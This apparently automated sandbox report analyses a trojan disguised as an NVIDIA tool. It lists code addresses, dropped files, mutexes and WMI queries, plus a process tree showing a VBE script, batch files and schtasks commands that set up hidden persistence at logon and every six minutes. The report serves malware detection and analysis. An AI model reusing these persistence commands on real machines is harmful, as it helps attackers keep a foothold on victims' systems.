Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F2B6BD	12_2_00007FF848F2B6BD
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F2CE32	12_2_00007FF848F2CE32
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F2CDE5	12_2_00007FF848F2CDE5
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F2CC0A	12_2_00007FF848F2CC0A
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F2D08D	12_2_00007FF848F2D08D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490EF042	12_2_00007FF8490EF042
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490EDBEA	12_2_00007FF8490EDBEA
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490E09D2	12_2_00007FF8490E09D2
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490ED46D	12_2_00007FF8490ED46D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490C62F5	12_2_00007FF8490C62F5
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8490C6335	12_2_00007FF8490C6335
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF84916062B	12_2_00007FF84916062B
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF8491605A4	12_2_00007FF8491605A4
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF84916057B	12_2_00007FF84916057B
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F65029	14_2_00007FF848F65029
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F5A4C4	14_2_00007FF848F5A4C4
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F277F8	14_2_00007FF848F277F8
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F1F543	14_2_00007FF848F1F543
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F2B6BD	14_2_00007FF848F2B6BD
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F2CE32	14_2_00007FF848F2CE32
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F2CDE5	14_2_00007FF848F2CDE5
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F2CC0A	14_2_00007FF848F2CC0A
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F2D08D	14_2_00007FF848F2D08D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 14_2_00007FF848F10DAC	14_2_00007FF848F10DAC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F2B6BD	19_2_00007FF848F2B6BD
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F2CE32	19_2_00007FF848F2CE32
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F2CDE5	19_2_00007FF848F2CDE5
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F2CC0A	19_2_00007FF848F2CC0A
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F2D08D	19_2_00007FF848F2D08D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F277F8	19_2_00007FF848F277F8
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F65029	19_2_00007FF848F65029
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F5A4C4	19_2_00007FF848F5A4C4
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F1F543	19_2_00007FF848F1F543
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 19_2_00007FF848F10DAC	19_2_00007FF848F10DAC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF848F30DAC	21_2_00007FF848F30DAC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF8490E62F5	21_2_00007FF8490E62F5
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF8490E6335	21_2_00007FF8490E6335
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF84918062B	21_2_00007FF84918062B
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF8491805A4	21_2_00007FF8491805A4
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 21_2_00007FF84918057B	21_2_00007FF84918057B
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F277F8	26_2_00007FF848F277F8
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F2B6BD	26_2_00007FF848F2B6BD
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F2CE32	26_2_00007FF848F2CE32
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F2CDE5	26_2_00007FF848F2CDE5
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F2CC0A	26_2_00007FF848F2CC0A
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F2D08D	26_2_00007FF848F2D08D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F10DAC	26_2_00007FF848F10DAC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F1F543	26_2_00007FF848F1F543
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F6A469	26_2_00007FF848F6A469
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F5A4C4	26_2_00007FF848F5A4C4
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF848F65029	26_2_00007FF848F65029
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490C62F5	26_2_00007FF8490C62F5
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490C6335	26_2_00007FF8490C6335
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490EF042	26_2_00007FF8490EF042
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490EDBEA	26_2_00007FF8490EDBEA
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490D9E08	26_2_00007FF8490D9E08
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490E09D2	26_2_00007FF8490E09D2
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8490ED46D	26_2_00007FF8490ED46D
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF84916062B	26_2_00007FF84916062B
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF8491605A4	26_2_00007FF8491605A4
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 26_2_00007FF84916057B	26_2_00007FF84916057B

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AAjFTaDk.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: String function: 0101EB78 appears 39 times
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: String function: 0101F5F0 appears 31 times
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: String function: 0101EC50 appears 56 times

Source: GwjbnDUU.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ShoatPdx.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IyVKJmYP.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: AVNUZtIi.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UCVIiXUm.log.12.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DnVLkBOS.log.12.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: JfykNhTG.log.12.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: zwfUdEOY.log.12.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: qiYwETGO.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LxmktYfY.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: CTevJfQr.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: skLfaCLK.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PszJebvu.log.26.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: cjQhkVuX.log.26.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: TAxSAtpp.log.26.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IMSbQhuH.log.26.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: chLhgIIs.log.31.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: oSRflUSV.log.31.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: fjyPCrNn.log.31.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: VAeASPIF.log.31.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: snUoPbCy.log.37.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NBjcEgcI.log.37.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DSPMVDWa.log.37.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ukwwlbRt.log.37.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: xYhnoKfH.log.42.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XwgSVREI.log.42.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: OOMCloya.log.42.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DaiMBcDs.log.42.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gzqzblNZ.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: AOEnQqnj.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: hxRHxlcT.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XOysNJXm.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pAbpDGmk.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: TxJtcnQc.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: JOqdsLLu.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BlhnJSvN.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HbFMikPW.log.57.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: TMLKnwYz.log.57.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: JesvDTTS.log.57.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: AAjFTaDk.log.57.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: NVIDIAShare.exe.bin.exe

Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs NVIDIAShare.exe.bin.exe

Source: NVIDIAShare.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: NVIDIA Container.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hBoBqOIwjXsCbkOMEKwZ.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@106/78@1/1

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_01006C74 GetLastError,FormatMessageW,

0_2_01006C74

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_0101A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0101A6C2

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

File created: C:\Users\user\AppData\Roaming\NVIDIA

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\b11c43509f862efb5e6ac76246280a4e4f539faad6021ed5aa3ed20238541750
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_03

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe

File created: C:\Users\user\AppData\Local\Temp\e5b1d191efd6658c81c1e31a8eff125602419669

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Command line argument: sfxname	0_2_0101DF1E
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Command line argument: sfxstime	0_2_0101DF1E
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Command line argument: STARTDLG	0_2_0101DF1E

Source: NVIDIAShare.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NVIDIAShare.exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NVIDIAShare.exe.bin.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

File read: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe"
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZ" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
